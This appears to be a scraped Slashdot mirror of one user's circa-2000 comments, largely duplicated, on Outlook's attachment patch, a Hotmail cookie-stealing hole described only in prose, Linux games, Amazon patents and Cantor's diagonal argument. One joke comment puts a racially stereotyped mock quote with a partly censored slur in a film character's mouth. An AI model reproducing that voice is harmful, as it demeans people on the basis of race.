Viruses aren't spread by people you don't know anymore, they're spread by your stupid, clueless friends and family!
Very true, and a really good point. However, don't make the assumption that my loved ones would go into my "trusted user" list. My network admins, co-sysadmins, and a few other technical professionals I know might make that list. My mother? No way.
(That's not to say that somebody's mother isn't going to make that list. Just not mine.)
Actually, ZIP files are addressed: Outlook now pops open a message warning the user that the file may contain evil Blue Meanies (or words to that effect). It's really more of a deterrent than anything else, but it's a better deterrent than was there before.
Except, of course, CAB, ARJ, TAR, and GZIP files don't carry an equivalent warning. Such is life when you're inside the box, so to speak.
Okay, folks, stop saying "Hey, they took attachments out of Outlook!" Here's what actually happened:
The MS patch revolves around defining various types of security levels for attachments. At present, they only define two levels. At level 1 (.exe,.com,.vbs, et cetera), the attachment is deleted. Poof. Gone.
At level two (just.zip files), opening the attachment shows a warning to the effect of, "Hey, this file, it could be really really bad, so be careful before you open it, okay?"
Obvious weaknesses:
The.zip file attachment filter is absolutely ludicrous: anyone with a copy of WinZip can also open.arj,.cab,.tar, and.gzip files (and probably a full other types to boot). None of those file types are addressed.
Executable files that you want distributed are nuked. Outta luck.
This patch breaks functionality with a whole bunch of software. I don't know if this was avoidable (can't make an omlette without breaking some eggs), but it sucks.
What the release gets right:
IE does have a pretty nifty security model in that it offers multiple layers of trust for various sites/domains (trusted, "Internet", restricted, custom). Anything sent by e-mail is now assumed to be from the "restricted" zone, unless manually reset. I'd prefer to see a per-user trust level for e-mail, but that can only come with the widespread adoption of an authentication model (like PGP, for example), which I don't see happening yet.
First of all, don't jump to the conclusion that games written for Linux are necessarily going to be better performers, either where netplay or graphics are concerned. Most graphics cards these days have better OOTB support for Windows, hands down. All things being equal, that translates to better performing games. And where netplay is concerned, that varies highly from game to game. Compare Unreal's unpatched netplay to the latest patchlevel, or to UT's. Compare either to Q3. On the same hardware, with the same OS.
Second, don't be ridiculous about "refusing to allow Linux ports." Companies like Loki don't politely knock on the doors of game companies and go, "Hey there, mind if we port your game for you? We'll only be a minute." Loki gets paid to do it. That's fine - they provide a service to their customers and they deserve the right to charge for it. But the folks at Blizzard aren't being evil because they don't feel like paying for a Linux port of the game.
If Loki can show that they can sell enough copies of a game for Linux, Blizzard will likely change their minds. Until then, don't have a hissyfit at Blizzard for looking out for their bottom line. This may come as a shock to you, but Blizzard, Loki, and the publishers of every game you're likley to find at the local Best Buy are, in fact, in it for the money.
Contrary to the reporting on/., the most recent Hotmail hole is in no way related to a VBS script. What's so alarming about the hole is that it is acutally an HTML file which contains the exploit. More specifically:
The folks over at Hotmail were smart enough to filter out JavaScript from HTML formatted messages sent to Hotmail recipients. They did not, however, think that it would be necessary to filter HTML attachments, either. As a result, a clever individual was able to construct an HTML page containing JavaScript which forwards HotMail authorization cookies to a third party.
Ironically, this information is largely reproduced from the article on Peacefire cited in the original post. No mention of VBS files anywhere.
For those of you who care about such things: the Zend optimizer for PHP is free as in beer, not speech. Please refer to http://www.zend.com/zend/optimizer.php
In essence, this boils down to a matter of taste. You seem to be saying that all of the games which really require that level of graphic support aren't really your cup of tea, but for tens of thousands of people, it is precisely their cup of tea.
On the RTS front, while it was certainly a playable-as-hell game, I heard plenty of people complain that their brand new, whopping fast machine was limited to 800x600 in Starcraft, just because Starcraft couldn't go any higher. Myth was the first (fairly) recent game to really start to reverse that trend: Homeworld tried to completely stand it on its ear.
As magnificent a game as I thought Homeworld was, I really did feel that it was limited to some degree by the constraints of the technology: many strike craft + many ion cannons = big framerate losses.
So, in other words, pay attention: I'm predicting that newer RTS games will will benefit from better tech more than their predecessors did.
I'm not sure you're giving Quake its due. You're right in that the plot was absoultely forgettable, but there were genuine moments of absoulute terror for me in that game: the first time I saw (and heard) those zombies get back up, or when I first found myself toe-to-toe with a shambler.
It also was the first FPS to be genuinely playable over the internet, Kali notwithstanding. Not to mention the polygonal critters. And truly 3d environments, as opposed to the sort of stacked-2d method that the Dooms used.
Every game they've released since then seems to have been a case of diminishing returns. Quake was a major step forward for the FPS genre, if only for the polygonal critters and environments. Q2 was Q1 with a plot, better graphics, and lower latency. Q3... urgh. I was really disappointed by Q3.
I think maybe that Romero could forsee where this was all heading, which is what created his dissatisfaction with id software. It's a pity that Daikatana doesn't look like it's going to come near being the game he thought it would be.
Actually, what am I saying? Any man with hair like that deserves what he gets.
Legend has it that the really good crackers never say anything and are never known to the world. I don't know if thats really true or not (how could you verify it, really?), but everyone else brags a lot.
Someone one asked Alfred Hitchcock what the ultimate crime was. His response: "The one we haven't heard about yet."
I have this image of Lando, at age seven, as a tough-talking gansta wanna-be, before learning that you can catch more flies with honey and evolving into soopa-slick Billy Dee.
"You say people gonna die? I'll tell you who's gonna die - it's always the white Naboo who start wars, and the black men who get killed. F**k that s**t, b***h, this n***a ain't fighting!"
Whoa! Can you imagine what kind of a 'l33t Beowulf cluster you could do with this? I mean, you wouldn't even have to have seperate boxes! You could just run 'em all on the same machine!
[IMHO]RMS needs to lighten his stance against Amazon. I think Jeff Bezos's reply to Tim O'Reilly's open letter did a good job of explaning why Amazon had to get the patents it did.
I have to disagree here. Bezos ' letter does condede that patents can indeed be harmful to innovation, but offers no reason for why his patents should stand, other than to say "I don't believe it would be right for us to [relinquish those patents]... even though the vast majority of our competitive advantage will continue to come not from patents, but from raising the bar on things like service, price, and selection." Note that Bezos could have argued that 1-Click (or any of the other patents which Amazon holds) were sufficiently innovative and distinctive to merit their own patents: he did not.
Stallman's criticism is that Bezos cannot (and, as nearly as I can tell, did not) argue that his patent was acquired for purely defensive reasons. A defensive patent is never used to launch a lawsuit. Protecting your business investment is one thing: suing someone is quite another.
Consider that the $24 price difference is not a fee but a discount for having a room without an ethernet connection.
Enh. I don't buy it. Let's say you own an apartment building which is fully wired, and operate a little ISP for the tenants. The fee for this service is included in the bill, but if someone doesn't want to make use of it, they can take a deduction on their rent instead. If you find out that someone has run a patch cable into another apartment to steal the access there... well, shame on you for having left the port connected, but it still seems pretty clear that the guy is willfully taking something he should've paid for.
Also consider that the right to use campus computing resources doesn't extend to all of those resources. Students aren't allowed administrative access to billing records, for example. Likewise, OSU had offered a service as part of their housing package, with a discount for individuals who didn't want to / couldn't take advantage of it. Can't have your cake and eat it too.
That said, OSU is going to have its hands full explaining why other students who did the same thing (by bringing laptops computers to the port, instead of running long cables) aren't guilty of the same charge, or why the computer labs in the residence hall are in such poor shape.
Unlikely. Such a tactic would force Mattel to explain why the product doesn't block Yahoo, or AltaVista, or any one of a thousand directories or search engines which link to pornographic or "questionable" content. It's just too thin.
Check out the archives on Bugtraq (available at SecurityFocus.com. Although I wasn't able to find much during the 5 minutes or so I spent trying to navigate their irritatingly counterintuitive web site, I was able to locate documentation on a backdoor to 3Com switches. I also know (from having previously subscribed to that list) that it's far from the only back door intentionally left in a product.
Even our highly clueful friends at id were caught with their hands in the cookie jar. Carmack later went on record as saying that leaving the back door in the finished product was a dumb idea, and that he regretted the decision.
Mathematics is replete with proofs about infinite sets of numbers. My personal favorite (mostly because I actually understand it) is Cantor's hypothesis:
Cantor wanted to prove that even though there's an infinite number of integers, and an infinite number of "real" numbers, there are clearly more real numbers than integers. So he devised this infinitely large list. You take every real number (even ones of infinite length) and write them down on a convenient piece of infinitely large graph paper, one digit per square. Finally, you number each one in the left hand column with a counting number (positive integer).
Now, since you've used graph paper, you can show that there's a real number not on the list. You start at the first real number, take the digit in the first column, and change it to something else. Go to the second number, take the digit in the second column, and change it. And so on, and so forth, blah blah, nth digit from nth number, etc. In the end, you have a new real number which can't be duplicated anywhere on the list, because it's sure to vary from every other number by at least one digit. Furthermore, even if you add the new number to the bottom of the list, you haven't solved the problem: you can make a brand new number which still doesn't appear anywhere on the list just by repeating the process. This kind of proof utilizes what's called a "diagonalization method", since the number you wind up constructing can be viewed by drawing a diagonal line across the list of reals you made up.
Anyway, this is getting way too long. The upshot: there are plenty of examples in mathematics of people making proofs about infinite sets of numbers, and they don't have to sit down with calculators for an infinite length of time to write them. More to the point, since no one actually can enumerate all of the primes (because there are infinitely many of them, see), no computer program is going to be solving this one any time soon.
This is way off topic, so feel free to moderate down. However:
In other Andover-related news, the stock of the parent company, VA Linux, dropped below 100 for the first time today. This continues the screaming dive from the high of 320 only last December. How low can it go?
This is to be expected. The initial reaction of the market to VA's IPO could only have been described as (with apologies to Greenspan) irrational exuberance. The only reason they had such a huge first day run-up was because the market thinks Linux is nifty. After it starts to occur to people that in a lot of ways, VA looks suspicously like anyotherOEM, they'll start to wonder why they threw all that money at it in the first place.
Most importantly, grab a few articles about Linux from non-technical publications: for example, Forbes ran a great cover story not terribly long ago on Linus Torvalds. Once you can demonstrate that "big-media" is covering Linux, your teachers will be less likely to dismiss it as some weird geeky fad.
Good points, good article. I'm not sure I agree with all of the points it raises, though.
The author states that "Location Poisoning disables proxy servers, DNS caching and other mechanisms that reduce the amount of net traffic." This is true, but the situation isn't as dire as you might think at first blush. Without having any numbers to back up my claim, I'm going to assert that in the average web transaction (from DNS lookup to the last request fulfillment on a single page), transmission of images takes up the vast majority of the bandwidth used. If the page author serves images from a central location (<img src="http://images.etcetra.org/blah.gif">) they'll still be cached normally by web proxies. So, it's bad, but it can be mitigated somewhat by clever design.
On the other hand, I detest what this does to bookmarks. Bleah.
In the end, I don't see this technology as having much value, even if you strip out all the negatives. Even if you don't have to screw around with passing cookies or GET args as session identifiers, you still need to change state in your database for any reasonably useful application (read: shopping cart). If you can set something like that up, then there's no reason you couldn't have set up some other, less objectionable form of session management.
Slashdot Mirror
Very true, and a really good point. However, don't make the assumption that my loved ones would go into my "trusted user" list. My network admins, co-sysadmins, and a few other technical professionals I know might make that list. My mother? No way.
(That's not to say that somebody's mother isn't going to make that list. Just not mine.)
Actually, ZIP files are addressed: Outlook now pops open a message warning the user that the file may contain evil Blue Meanies (or words to that effect). It's really more of a deterrent than anything else, but it's a better deterrent than was there before.
Except, of course, CAB, ARJ, TAR, and GZIP files don't carry an equivalent warning. Such is life when you're inside the box, so to speak.
Okay, folks, stop saying "Hey, they took attachments out of Outlook!" Here's what actually happened:
The MS patch revolves around defining various types of security levels for attachments. At present, they only define two levels. At level 1 (.exe, .com, .vbs, et cetera), the attachment is deleted. Poof. Gone.
At level two (just .zip files), opening the attachment shows a warning to the effect of, "Hey, this file, it could be really really bad, so be careful before you open it, okay?"
Obvious weaknesses:
What the release gets right:
IE does have a pretty nifty security model in that it offers multiple layers of trust for various sites/domains (trusted, "Internet", restricted, custom). Anything sent by e-mail is now assumed to be from the "restricted" zone, unless manually reset. I'd prefer to see a per-user trust level for e-mail, but that can only come with the widespread adoption of an authentication model (like PGP, for example), which I don't see happening yet.
Oh, please.
First of all, don't jump to the conclusion that games written for Linux are necessarily going to be better performers, either where netplay or graphics are concerned. Most graphics cards these days have better OOTB support for Windows, hands down. All things being equal, that translates to better performing games. And where netplay is concerned, that varies highly from game to game. Compare Unreal's unpatched netplay to the latest patchlevel, or to UT's. Compare either to Q3. On the same hardware, with the same OS.
Second, don't be ridiculous about "refusing to allow Linux ports." Companies like Loki don't politely knock on the doors of game companies and go, "Hey there, mind if we port your game for you? We'll only be a minute." Loki gets paid to do it. That's fine - they provide a service to their customers and they deserve the right to charge for it. But the folks at Blizzard aren't being evil because they don't feel like paying for a Linux port of the game.
If Loki can show that they can sell enough copies of a game for Linux, Blizzard will likely change their minds. Until then, don't have a hissyfit at Blizzard for looking out for their bottom line. This may come as a shock to you, but Blizzard, Loki, and the publishers of every game you're likley to find at the local Best Buy are, in fact, in it for the money.
Not automatically: the items still have to be selected in order to be viewed. However, that's enough for the script to run and capture session data.
Contrary to the reporting on /., the most recent Hotmail hole is in no way related to a VBS script. What's so alarming about the hole is that it is acutally an HTML file which contains the exploit. More specifically:
The folks over at Hotmail were smart enough to filter out JavaScript from HTML formatted messages sent to Hotmail recipients. They did not, however, think that it would be necessary to filter HTML attachments, either. As a result, a clever individual was able to construct an HTML page containing JavaScript which forwards HotMail authorization cookies to a third party.
Ironically, this information is largely reproduced from the article on Peacefire cited in the original post. No mention of VBS files anywhere.
Hush yo' mouth!
For those of you who care about such things: the Zend optimizer for PHP is free as in beer, not speech. Please refer to http://www.zend.com/zend/optimizer.php
In essence, this boils down to a matter of taste. You seem to be saying that all of the games which really require that level of graphic support aren't really your cup of tea, but for tens of thousands of people, it is precisely their cup of tea.
On the RTS front, while it was certainly a playable-as-hell game, I heard plenty of people complain that their brand new, whopping fast machine was limited to 800x600 in Starcraft, just because Starcraft couldn't go any higher. Myth was the first (fairly) recent game to really start to reverse that trend: Homeworld tried to completely stand it on its ear.
As magnificent a game as I thought Homeworld was, I really did feel that it was limited to some degree by the constraints of the technology: many strike craft + many ion cannons = big framerate losses.
So, in other words, pay attention: I'm predicting that newer RTS games will will benefit from better tech more than their predecessors did.
I'm not sure you're giving Quake its due. You're right in that the plot was absoultely forgettable, but there were genuine moments of absoulute terror for me in that game: the first time I saw (and heard) those zombies get back up, or when I first found myself toe-to-toe with a shambler.
It also was the first FPS to be genuinely playable over the internet, Kali notwithstanding. Not to mention the polygonal critters. And truly 3d environments, as opposed to the sort of stacked-2d method that the Dooms used.
Every game they've released since then seems to have been a case of diminishing returns. Quake was a major step forward for the FPS genre, if only for the polygonal critters and environments. Q2 was Q1 with a plot, better graphics, and lower latency. Q3... urgh. I was really disappointed by Q3.
I think maybe that Romero could forsee where this was all heading, which is what created his dissatisfaction with id software. It's a pity that Daikatana doesn't look like it's going to come near being the game he thought it would be.
Actually, what am I saying? Any man with hair like that deserves what he gets.
Legend has it that the really good crackers never say anything and are never known to the world. I don't know if thats really true or not (how could you verify it, really?), but everyone else brags a lot.
Someone one asked Alfred Hitchcock what the ultimate crime was. His response: "The one we haven't heard about yet."
Seems apropos.
Well, yeah. But this at least would save me the trouble of finding out by actually talking to them.
Me too. Not to mention "find". I could walk into a room and do this:
/usr/local/room -type f -perm 777 -size 7 -exec grep -l "thing for short furry Jewish guys" \{} \;
find
Think how much time (and rejection) that would save!
I have this image of Lando, at age seven, as a tough-talking gansta wanna-be, before learning that you can catch more flies with honey and evolving into soopa-slick Billy Dee.
"You say people gonna die? I'll tell you who's gonna die - it's always the white Naboo who start wars, and the black men who get killed. F**k that s**t, b***h, this n***a ain't fighting!"
I would have paid serious money to see that.
Spafford and Garfinkel wrote "Practical Unix and Internet Security," also a recommended read.
Whoa! Can you imagine what kind of a 'l33t Beowulf cluster you could do with this? I mean, you wouldn't even have to have seperate boxes! You could just run 'em all on the same machine!
</comment>
I have to disagree here. Bezos ' letter does condede that patents can indeed be harmful to innovation, but offers no reason for why his patents should stand, other than to say "I don't believe it would be right for us to [relinquish those patents]... even though the vast majority of our competitive advantage will continue to come not from patents, but from raising the bar on things like service, price, and selection." Note that Bezos could have argued that 1-Click (or any of the other patents which Amazon holds) were sufficiently innovative and distinctive to merit their own patents: he did not.
Stallman's criticism is that Bezos cannot (and, as nearly as I can tell, did not) argue that his patent was acquired for purely defensive reasons. A defensive patent is never used to launch a lawsuit. Protecting your business investment is one thing: suing someone is quite another.
Enh. I don't buy it. Let's say you own an apartment building which is fully wired, and operate a little ISP for the tenants. The fee for this service is included in the bill, but if someone doesn't want to make use of it, they can take a deduction on their rent instead. If you find out that someone has run a patch cable into another apartment to steal the access there... well, shame on you for having left the port connected, but it still seems pretty clear that the guy is willfully taking something he should've paid for.
Also consider that the right to use campus computing resources doesn't extend to all of those resources. Students aren't allowed administrative access to billing records, for example. Likewise, OSU had offered a service as part of their housing package, with a discount for individuals who didn't want to / couldn't take advantage of it. Can't have your cake and eat it too.
That said, OSU is going to have its hands full explaining why other students who did the same thing (by bringing laptops computers to the port, instead of running long cables) aren't guilty of the same charge, or why the computer labs in the residence hall are in such poor shape.
Unlikely. Such a tactic would force Mattel to explain why the product doesn't block Yahoo, or AltaVista, or any one of a thousand directories or search engines which link to pornographic or "questionable" content. It's just too thin.
Even our highly clueful friends at id were caught with their hands in the cookie jar. Carmack later went on record as saying that leaving the back door in the finished product was a dumb idea, and that he regretted the decision.
Erg. Sorry, wrong answer.
Mathematics is replete with proofs about infinite sets of numbers. My personal favorite (mostly because I actually understand it) is Cantor's hypothesis:
Cantor wanted to prove that even though there's an infinite number of integers, and an infinite number of "real" numbers, there are clearly more real numbers than integers. So he devised this infinitely large list. You take every real number (even ones of infinite length) and write them down on a convenient piece of infinitely large graph paper, one digit per square. Finally, you number each one in the left hand column with a counting number (positive integer).
Now, since you've used graph paper, you can show that there's a real number not on the list. You start at the first real number, take the digit in the first column, and change it to something else. Go to the second number, take the digit in the second column, and change it. And so on, and so forth, blah blah, nth digit from nth number, etc. In the end, you have a new real number which can't be duplicated anywhere on the list, because it's sure to vary from every other number by at least one digit. Furthermore, even if you add the new number to the bottom of the list, you haven't solved the problem: you can make a brand new number which still doesn't appear anywhere on the list just by repeating the process. This kind of proof utilizes what's called a "diagonalization method", since the number you wind up constructing can be viewed by drawing a diagonal line across the list of reals you made up.
Anyway, this is getting way too long. The upshot: there are plenty of examples in mathematics of people making proofs about infinite sets of numbers, and they don't have to sit down with calculators for an infinite length of time to write them. More to the point, since no one actually can enumerate all of the primes (because there are infinitely many of them, see), no computer program is going to be solving this one any time soon.
This is to be expected. The initial reaction of the market to VA's IPO could only have been described as (with apologies to Greenspan) irrational exuberance. The only reason they had such a huge first day run-up was because the market thinks Linux is nifty. After it starts to occur to people that in a lot of ways, VA looks suspicously like any other OEM, they'll start to wonder why they threw all that money at it in the first place.
Um. I think that the quote was intended as, "Okay, that's one billionaire putting his money to good use. What about the rest [of the billionaires]?"
Most importantly, grab a few articles about Linux from non-technical publications: for example, Forbes ran a great cover story not terribly long ago on Linus Torvalds. Once you can demonstrate that "big-media" is covering Linux, your teachers will be less likely to dismiss it as some weird geeky fad.
Good points, good article. I'm not sure I agree with all of the points it raises, though.
The author states that "Location Poisoning disables proxy servers, DNS caching and other mechanisms that reduce the amount of net traffic." This is true, but the situation isn't as dire as you might think at first blush. Without having any numbers to back up my claim, I'm going to assert that in the average web transaction (from DNS lookup to the last request fulfillment on a single page), transmission of images takes up the vast majority of the bandwidth used. If the page author serves images from a central location (<img src="http://images.etcetra.org/blah.gif">) they'll still be cached normally by web proxies. So, it's bad, but it can be mitigated somewhat by clever design.
On the other hand, I detest what this does to bookmarks. Bleah.
In the end, I don't see this technology as having much value, even if you strip out all the negatives. Even if you don't have to screw around with passing cookies or GET args as session identifiers, you still need to change state in your database for any reasonably useful application (read: shopping cart). If you can set something like that up, then there's no reason you couldn't have set up some other, less objectionable form of session management.